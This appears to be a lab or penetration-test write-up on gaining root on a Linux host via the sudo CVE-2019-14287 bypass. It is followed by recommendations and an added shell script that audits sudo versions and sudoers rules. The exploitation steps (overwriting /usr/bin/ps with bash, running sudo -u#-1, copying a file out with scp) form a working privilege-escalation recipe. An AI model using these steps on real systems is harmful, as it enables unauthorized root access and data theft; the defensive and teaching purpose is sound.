Gary Jones
Privilege Escalation on Devbox Using Sudo Exploit

Situation:

The goal of this exercise was to exploit a Linux machine, devbox.artstailor.com, by leveraging a relatively recent vulnerability. Changes to the machine's configuration rendered previously successful methods ineffective, requiring new techniques for privilege escalation and access.


Obstacles:

  1. Configuration Changes:
    • Prior exploitation methods were no longer viable due to system updates.
  2. Limited Exploit Options:
    • Identifying applicable vulnerabilities required detailed system and kernel analysis.
  3. Dynamic Environment:
    • Changes in system behavior necessitated creative adaptation of known exploits.

Actions Taken:

  1. System Enumeration:
    • Ran cat /etc/os-release to identify the distribution and release (the kernel version does not appear in that file; uname -r reports it).
    • Analyzed system logs, kernel details, and services for exploitable vulnerabilities.
  2. Identified Vulnerability:
    • Found that the installed Sudo was affected by CVE-2019-14287 (fixed in sudo 1.8.28): when a sudoers rule lets a user run a command as any user except root, written (ALL, !root), passing the user ID -1 as sudo -u#-1 (or -u#4294967295) makes sudo run the command as UID 0. The user's own password is still required unless the rule is NOPASSWD. sudo --version and sudo -l show whether both conditions hold on a target.
    • Referenced Exploit-DB entry: https://www.exploit-db.com/exploits/47502.
  3. Privilege Escalation:
    • Copied /bin/bash over /usr/bin/ps with cp so that the permitted command would launch a shell. Overwriting /usr/bin/ps requires write access to that path; confirm it with ls -l /usr/bin/ps before relying on this step.
    • Ran sudo -u#-1 /usr/bin/ps; sudo resolved the -1 to UID 0 and started the copied bash with root privileges.
  4. File System Access:
    • Gained root access and explored the system directories.
    • Located MyDream.png in the /home/opp directory.
    • Transferred the file to the Kali host for review using scp.

Results:

  1. Root Access Achieved:
    • Exploited the Sudo vulnerability to gain full administrative control over devbox.artstailor.com.
  2. Sensitive File Obtained:
    • Accessed MyDream.png, which was not intended to be accessible by the current user.
  3. Security Flaws Identified:
    • An unpatched sudo combined with an (ALL, !root) style rule turned a "run as any non-root user" permission into full root access, a critical risk.

Tool Purpose Overview:

Sudo:

  • The privilege-escalation vector: an unpatched sudo (before 1.8.28) accepted the user ID -1 given as -u#-1 and ran the command as root, bypassing an (ALL, !root) restriction.

scp:

  • Used to securely transfer the file MyDream.png from devbox.artstailor.com to the Kali host.

cat:

  • Displayed /etc/os-release to identify the distribution and release; uname -r supplies the kernel version, which that file does not contain.

Exploit-DB:

  • Served as a reference database for identifying known exploits applicable to the system.

Recommendations:

  1. Patch Management:
    • Keep sudo at 1.8.28 or later (the first release that fixes CVE-2019-14287) and keep the rest of the system patched against known vulnerabilities.
  2. Audit Sudo Configurations:
    • Regularly review sudoers and avoid rules of the form (ALL, !root): a deny-list in the Runas specification is exactly what this bug bypassed, so name the permitted target accounts explicitly and restrict the allowed commands.
  3. Session Management:
    • Clear command-line histories and cached data to prevent leakage of sensitive information.
  4. Regular Penetration Testing:
    • Continuously test and evaluate system defenses to identify exploitable vulnerabilities.
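
The pre-exploitation check from Actions Taken (steps 1 and 2) and the sudoers audit from Recommendation 2 reduce to the same two tests: is sudo older than 1.8.28, and does any rule use an (ALL, !root) Runas list. The script below is an added example, not the writeup's own commands. It assumes the usual first line of sudo --version ("Sudo version 1.8.21p2") and runs against a constructed sample sudoers file whose account names and rules are invented for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup): checks for the two
# conditions CVE-2019-14287 needs, an unpatched sudo (< 1.8.28) and a
# sudoers rule of the form "(ALL, !root)", and audits a sudoers file for
# such rules. The sample sudoers content below is constructed.

# Extract "1.8.21p2" from the first line of `sudo --version` output.
sudo_version_from_banner() {
    printf '%s\n' "$1" | awk '/^Sudo version/ { print $3; exit }'
}

# Exit 0 when a sudo version is older than 1.8.28, the first release with
# the fix. A trailing patch tag such as "p2" is ignored; "1.9" reads as 1.9.0.
sudo_version_vulnerable() {
    ver=${1%%p*}
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    case $rest in
        *.*) patch=${rest#*.} ;;
        *)   patch=0 ;;
    esac
    if   [ "$major" -lt 1 ]; then return 0
    elif [ "$major" -gt 1 ]; then return 1
    elif [ "$minor" -lt 8 ]; then return 0
    elif [ "$minor" -gt 8 ]; then return 1
    fi
    [ "$patch" -lt 28 ]
}

# Print the non-comment lines of a sudoers file (or stdin when no file is
# given, so `sudo -l` output can be piped in) whose Runas list is
# "everyone except root". Exit status is grep's: 0 if any were found.
audit_sudoers() {
    grep -Ev '^[[:space:]]*#' "${1:--}" |
        grep -E '\(ALL[[:space:]]*,[[:space:]]*!root[[:space:]]*\)'
}

# Exit 0 only when both conditions hold for a given version banner and
# sudoers file; this is the check to run before trying `sudo -u#-1 <cmd>`.
check_target() {
    ver=$(sudo_version_from_banner "$1")
    [ -n "$ver" ] || return 1
    sudo_version_vulnerable "$ver" && audit_sudoers "$2" >/dev/null
}

# Constructed sample sudoers content (not the devbox's real file).
SAMPLE_SUDOERS=$(mktemp)
trap 'rm -f "$SAMPLE_SUDOERS"' EXIT
cat >"$SAMPLE_SUDOERS" <<'EOF'
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
# Exploitable shape: any user except root, with the caller's own password.
webdev  ALL=(ALL, !root) /usr/bin/ps
# Same shape without the space; NOPASSWD means no password is needed at all.
ops     ALL=(ALL,!root) NOPASSWD: /usr/bin/systemctl
# Safe shape: the Runas list names the intended account instead of denying root.
backup  ALL=(postgres) /usr/bin/pg_dump
EOF

if check_target "Sudo version 1.8.21p2" "$SAMPLE_SUDOERS"; then
    echo "vulnerable: sudo < 1.8.28 and an (ALL, !root) rule is present:"
    audit_sudoers "$SAMPLE_SUDOERS"
    # On a real target the bypass is then `sudo -u#-1 /usr/bin/ps`
    # (-u#4294967295 is equivalent); the writeup ran that after copying
    # /bin/bash over /usr/bin/ps.
fi
```

On the target, /etc/sudoers is not readable without root, so from the low-privileged account use check_target on the output of sudo -l instead: it lists the rules that apply to the caller in the same (ALL, !root) notation, and can be piped into audit_sudoers directly.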
